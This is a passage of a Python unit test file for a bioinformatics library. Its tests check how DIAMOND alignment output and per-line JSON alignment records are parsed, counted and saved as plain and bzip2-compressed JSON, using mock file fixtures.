                        "sbjct_start": 9
                    },
                    {
                        "bits": 23.5,
                        "btop": "6",
                        "expect": 0.21,
                        "frame": 1,
                        "identicalCount": 3,
                        "percentIdentical": None,
                        "positiveCount": 4,
                        "percentPositive": None,
                        "query": "TIMSVV",
                        "query_end": 240,
                        "query_start": 177,
                        "sbjct": "DDMV",
                        "sbjct_end": 235,
                        "sbjct_start": 179
                    }
                ],
                "length": 293,
                "title": "Golden"
            },
            {
                "hsps": [
                    {
                        "bits": 25.0,
                        "btop": "6",
                        "expect": 0.084,
                        "frame": 1,
                        "identicalCount": 4,
                        "percentIdentical": None,
                        "positiveCount": 5,
                        "percentPositive": None,
                        "query": "LHVNYL",
                        "query_end": 203,
                        "query_start": 1,
                        "sbjct": "DEELKA",
                        "sbjct_end": 210,
                        "sbjct_start": 2
                    },
                    {
                        "bits": 18.5,
                        "btop": "9",
                        "expect": 9.1,
                        "frame": 1,
                        "identicalCount": 5,
                        "percentIdentical": None,
                        "positiveCount": 6,
                        "percentPositive": None,
                        "query": "SEIICE",
                        "query_end": 257,
                        "query_start": 226,
                        "sbjct": "VETVAQ",
                        "sbjct_end": 45,
                        "sbjct_start": 20
                    }
                ],
                "length": 290,
                "title": "HCoV"
            },
            {
                "hsps": [
                    {
                        "bits": 24.6,
                        "btop": "10",
                        "expect": 0.11,
                        "frame": 1,
                        "identicalCount": 6,
                        "percentIdentical": None,
                        "positiveCount": 7,
                        "percentPositive": None,
                        "query": "YSCFT",
                        "query_end": 276,
                        "query_start": 176,
                        "sbjct": "LGKRMFC",
                        "sbjct_end": 243,
                        "sbjct_start": 152
}
],
"length": 270,
"title": "FERV"
}
],
"query": "ACC94"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 634.0,
"btop": "8",
"expect": 0.0,
"frame": 1,
"identicalCount": 7,
"percentIdentical": None,
"positiveCount": 8,
"percentPositive": None,
"query": "GEPFSV",
"query_end": 306,
"query_start": 1,
"sbjct": "NIYGEP",
"sbjct_end": 306,
"sbjct_start": 1
}
],
"length": 306,
"title": "AKAV"
},
{
"hsps": [
{
"bits": 401.0,
"btop": "8",
"expect": 7e-143,
"frame": 1,
"identicalCount": 8,
"percentIdentical": None,
"positiveCount": 9,
"percentPositive": None,
"query": "PFSVYG",
"query_end": 306,
"query_start": 1,
"sbjct": "GEPMS",
"sbjct_end": 294,
"sbjct_start": 1
}
],
"length": 294,
"title": "WYOV"
}
],
"query": "AKAV"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 28.1,
"btop": "8",
"expect": 0.008,
"frame": 1,
"identicalCount": 9,
"percentIdentical": None,
"positiveCount": 10,
"percentPositive": None,
"query": "PKELHG",
"query_end": 118,
"query_start": 14,
"sbjct": "SLKSKE",
"sbjct_end": 131,
"sbjct_start": 15
}
],
"length": 307,
"title": "TAIV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "5",
"expect": 0.009,
"frame": 1,
"identicalCount": 10,
"percentIdentical": None,
"positiveCount": 11,
"percentPositive": None,
"query": "CRPTF",
"query_end": 293,
"query_start": 4,
"sbjct": "EFVFIY",
"sbjct_end": 342,
"sbjct_start": 6
}
],
"length": 343,
"title": "SBAY"
}
],
"query": "BHAV"
}, sort_keys=True)
]) + '\n'
DIAMOND_RECORDS_WITH_PERCENTS_DUMPED = '\n'.join([
dumps({
"application": "DIAMOND",
"reference": ("Buchfink et al., Fast and Sensitive "
"Protein Alignment using DIAMOND, Nature Methods, "
"12, 59-60 (2015)"),
"task": "blastx",
"version": "v0.8.23"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 29.6,
"btop": "4",
"expect": 0.003,
"frame": 1,
"identicalCount": 2,
"percentIdentical": 5.0,
"percentPositive": 4.0,
"positiveCount": 1,
"query": "EFII",
"query_end": 295,
"query_start": 178,
"sbjct": "SSSEV",
"sbjct_end": 285,
"sbjct_start": 175
}
],
"length": 295,
"title": "INSV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "3",
"expect": 0.008,
"frame": 1,
"identicalCount": 3,
"percentIdentical": 10.0,
"percentPositive": 9.0,
"positiveCount": 2,
"query": "KLL",
"query_end": 37,
"query_start": 7,
"sbjct": "ITRV",
"sbjct_end": 39,
"sbjct_start": 9
}
],
"length": 300,
"title": "CASV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "5",
"expect": 0.009,
"frame": 1,
"identicalCount": 4,
"percentIdentical": 15.0,
"percentPositive": 14.0,
"positiveCount": 3,
"query": "IKSKL",
"query_end": 35,
"query_start": 7,
"sbjct": "EETSR",
"sbjct_end": 37,
"sbjct_start": 9
},
{
"bits": 23.5,
"btop": "6",
"expect": 0.21,
"frame": 1,
"identicalCount": 5,
"percentIdentical": 20.0,
"percentPositive": 19.0,
"positiveCount": 4,
"query": "TIMSVV",
"query_end": 240,
"query_start": 177,
"sbjct": "DDMV",
"sbjct_end": 235,
"sbjct_start": 179
}
],
"length": 293,
"title": "Golden"
},
{
"hsps": [
{
"bits": 25.0,
"btop": "6",
"expect": 0.084,
"frame": 1,
"identicalCount": 6,
"percentIdentical": 25.0,
"percentPositive": 24.0,
"positiveCount": 5,
"query": "LHVNYL",
"query_end": 203,
"query_start": 1,
"sbjct": "DEELKA",
"sbjct_end": 210,
"sbjct_start": 2
},
{
"bits": 18.5,
"btop": "9",
"expect": 9.1,
"frame": 1,
"identicalCount": 7,
"percentIdentical": 30.0,
"percentPositive": 29.0,
"positiveCount": 6,
"query": "SEIICE",
"query_end": 257,
"query_start": 226,
"sbjct": "VETVAQ",
"sbjct_end": 45,
"sbjct_start": 20
}
],
"length": 290,
"title": "HCoV"
},
{
"hsps": [
{
"bits": 24.6,
"btop": "10",
"expect": 0.11,
"frame": 1,
"identicalCount": 8,
"percentIdentical": 35.0,
"percentPositive": 34.0,
"positiveCount": 7,
"query": "YSCFT",
"query_end": 276,
"query_start": 176,
"sbjct": "LGKRMFC",
"sbjct_end": 243,
"sbjct_start": 152
}
],
"length": 270,
"title": "FERV"
}
],
"query": "ACC94"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 634.0,
"btop": "8",
"expect": 0.0,
"frame": 1,
"identicalCount": 9,
"percentIdentical": 40.0,
"percentPositive": 39.0,
"positiveCount": 8,
"query": "GEPFSV",
"query_end": 306,
"query_start": 1,
"sbjct": "NIYGEP",
"sbjct_end": 306,
"sbjct_start": 1
}
],
"length": 306,
"title": "AKAV"
},
{
"hsps": [
{
"bits": 401.0,
"btop": "8",
"expect": 7e-143,
"frame": 1,
"identicalCount": 10,
"percentIdentical": 45.0,
"percentPositive": 44.0,
"positiveCount": 9,
"query": "PFSVYG",
"query_end": 306,
"query_start": 1,
"sbjct": "GEPMS",
"sbjct_end": 294,
"sbjct_start": 1
}
],
"length": 294,
"title": "WYOV"
}
],
"query": "AKAV"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 28.1,
"btop": "8",
"expect": 0.008,
"frame": 1,
"identicalCount": 11,
"percentIdentical": 50.0,
"percentPositive": 49.0,
"positiveCount": 10,
"query": "PKELHG",
"query_end": 118,
"query_start": 14,
"sbjct": "SLKSKE",
"sbjct_end": 131,
"sbjct_start": 15
}
],
"length": 307,
"title": "TAIV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "5",
"expect": 0.009,
"frame": 1,
"identicalCount": 12,
"percentIdentical": 55.0,
"percentPositive": 54.0,
"positiveCount": 11,
"query": "CRPTF",
"query_end": 293,
"query_start": 4,
"sbjct": "EFVFIY",
"sbjct_end": 342,
"sbjct_start": 6
}
],
"length": 343,
"title": "SBAY"
}
],
"query": "BHAV"
}, sort_keys=True)
]) + '\n'
class TestDiamondTabularFormatReader(TestCase):
"""
Test the DiamondTabularFormatReader class.
"""
def testDiamondParams(self):
"""
When a DIAMOND file has been read, its parameters must be present
in the reader instance.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
list(reader.records())
self.assertEqual('DIAMOND', reader.application)
self.assertEqual(
{
'application': 'DIAMOND',
'reference': (
'Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, '
'59-60 (2015)'),
'task': 'blastx',
'version': 'v0.8.23',
},
reader.params)
def testDiamondInput(self):
"""
Test conversion of a chunk of DIAMOND output.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
acc94, akav, bhav = list(reader.records())
self.assertEqual(5, len(acc94['alignments']))
self.assertEqual(2, len(akav['alignments']))
self.assertEqual(2, len(bhav['alignments']))
def testDiamondInputWithoutNidentOrPositives(self):
"""
        Test conversion of a chunk of DIAMOND output that does not contain
        the nident, pident, positive, or ppos fields.
"""
mockOpener = mock_open(
read_data=DIAMOND_RECORDS_WITHOUT_NIDENT_AND_POSITIVE)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
acc94, akav, bhav = list(reader.records())
            for record in acc94, akav, bhav:
                for alignment in record['alignments']:
                    for hsp in alignment['hsps']:
                        self.assertIs(None, hsp['identicalCount'])
                        self.assertIs(None, hsp['positiveCount'])
                        self.assertIs(None, hsp['percentIdentical'])
                        self.assertIs(None, hsp['percentPositive'])
def testSaveAsJSON(self):
"""
A DiamondTabularFormatReader must be able to save itself as JSON.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
fp = StringIO()
reader.saveAsJSON(fp)
self.maxDiff = None
self.assertEqual(DIAMOND_RECORDS_DUMPED, fp.getvalue())
def testSaveAsJSONWithPercentIdentical(self):
"""
        A DiamondTabularFormatReader must be able to save itself as JSON
        when the percent identical and percent positive fields are present.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS_WITH_PERCENTS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
fp = StringIO()
reader.saveAsJSON(fp)
self.maxDiff = None
self.assertEqual(DIAMOND_RECORDS_WITH_PERCENTS_DUMPED,
fp.getvalue())
def testSaveAsJSONBzip2(self):
"""
A DiamondTabularFormatReader must be able to save itself as bzip2'd
JSON.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
data = BytesIO()
fp = bz2file.BZ2File(data, 'w')
reader.saveAsJSON(fp, writeBytes=True)
fp.close()
self.assertEqual(
compress(DIAMOND_RECORDS_DUMPED.encode('UTF-8')),
data.getvalue())
def testSaveAsJSONBzip2WithPercentIdentical(self):
"""
        A DiamondTabularFormatReader must be able to save itself as bzip2'd
        JSON when the percent identical and percent positive fields are
        present.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS_WITH_PERCENTS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
data = BytesIO()
fp = bz2file.BZ2File(data, 'w')
reader.saveAsJSON(fp, writeBytes=True)
fp.close()
self.assertEqual(
compress(DIAMOND_RECORDS_WITH_PERCENTS_DUMPED.encode('UTF-8')),
data.getvalue())
def testSpacesMustBePreserved(self):
"""
If there are spaces in the query title or subject titles, the spaces
must be preserved.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORD_WITH_SPACES_IN_TITLES)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
acc94 = list(reader.records())
self.assertEqual('ACC 94', acc94[0]['query'])
self.assertEqual('IN SV', acc94[0]['alignments'][0]['title'])
_JSON_RECORDS = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 1817,
'sbjct_end': 1849,
'bits': 165.393,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 2.73597e-40,
'query_end': 99,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGT'
'TTTCGGGGGTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGT'
'GTTTTGTTGTGGTTG'),
}
]
}
],
'query': 'id1'
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2'
},
{
'alignments': [],
'query': 'id3'
},
{
'alignments': [],
'query': 'id4'
},
]
_JSON_RECORDS_ONE_MIDDLE = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 1817,
'sbjct_end': 1849,
'bits': 165.393,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 2.73597e-40,
'query_end': 99,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGT'
'TTTCGGGGGTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGT'
'GTTTTGTTGTGGTTG'),
}
]
}
],
'query': 'id1'
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2'
},
{
'alignments': [],
'query': 'id4'
},
]
_JSON_RECORDS_ONE_END = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 1817,
'sbjct_end': 1849,
'bits': 165.393,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 2.73597e-40,
'query_end': 99,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGT'
'TTTCGGGGGTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGT'
'GTTTTGTTGTGGTTG'),
}
]
}
],
'query': 'id1'
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2'
},
{
'alignments': [],
'query': 'id3'
},
]
_JSON_RECORDS_ONE_START = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2'
},
{
'alignments': [],
'query': 'id3'
},
{
'alignments': [],
'query': 'id4'
},
]
_JSON_RECORDS_TWO_END = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 1817,
'sbjct_end': 1849,
'bits': 165.393,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 2.73597e-40,
'query_end': 99,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGT'
'TTTCGGGGGTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGT'
'GTTTTGTTGTGGTTG'),
}
]
}
],
'query': 'id1 1'
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2 2'
},
]
def _recordsToStr(records):
"""
Convert a list of DIAMOND JSON records to a string.
@param records: A C{list} of C{dict}s as would be found in our per-line
JSON conversion of DIAMOND's tabular output.
@return: A C{str} suitable for use in a test simulating reading input
containing our per-line JSON.
"""
return '\n'.join(dumps(record) for record in records) + '\n'
JSON = _recordsToStr(_JSON_RECORDS)
JSON_ONE_MIDDLE = _recordsToStr(_JSON_RECORDS_ONE_MIDDLE)
JSON_ONE_END = _recordsToStr(_JSON_RECORDS_ONE_END)
JSON_ONE_START = _recordsToStr(_JSON_RECORDS_ONE_START)
JSON_TWO_END = _recordsToStr(_JSON_RECORDS_TWO_END)
class TestJSONRecordsReader(TestCase):
"""
Test the JSONRecordsReader class.
"""
def testCorrectNumberOfAlignments(self):
"""
A JSONRecordsReader must return the expected number of alignments.
"""
reads = Reads([
AARead(
'id1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(4, len(alignments))
def testCorrectNumberOfAlignmentsMatchMissingMiddle(self):
"""
A JSONRecordsReader must return the expected number of alignments, if
a match is missing in the middle of the JSON file.
"""
reads = Reads([
AARead(
'id1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_ONE_MIDDLE)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(4, len(alignments))
def testCorrectNumberOfAlignmentsMatchMissingEnd(self):
"""
A JSONRecordsReader must return the expected number of alignments, if
the last read has no matches. (That read will not be examined by the
JSONRecordsReader.)
"""
reads = Reads([
AARead(
'id1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_ONE_END)
with patch.object(builtins, 'open', mockOpener):
reader = JSONRecordsReader('file.json')
alignments = list(reader.readAlignments(reads))
self.assertEqual(3, len(alignments))
def testCorrectNumberOfAlignmentsMatchMissingStart(self):
"""
A JSONRecordsReader must return the expected number of alignments, if
the first read has no matches.
"""
reads = Reads([
AARead(
'id1',
'AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGTTTTCGGGG'
'GTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGTGTTTTGTTGTGGTTGCG'),
AARead(
'id2',
'TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTCCTCTTTC'
'ACCACGAGTTAAACCATTAACATTATATTTTTCTATAATTATACCACTGGC'),
AARead(
'id3',
'ACCTCCGCCTCCCAGGTTCAAGCAATTCTCCTGCCTTAGCCTCCTGAATA'
'GCTGGGATTACAGGTATGCAGGAGGCTAAGGCAGGAGAATTGCTTGAACCT'),
AARead(
'id4',
'GAGGGTGGAGGTAACTGAGGAAGCAAAGGCTTGGAGACAGGGCCCCTCAT'
'AGCCAGTGAGTGCGCCATTTTCTTTGGAGCAATTGGGTGGGGAGATGGGGC'),
])
mockOpener = mock_open(read_data=JSON_ONE_START)
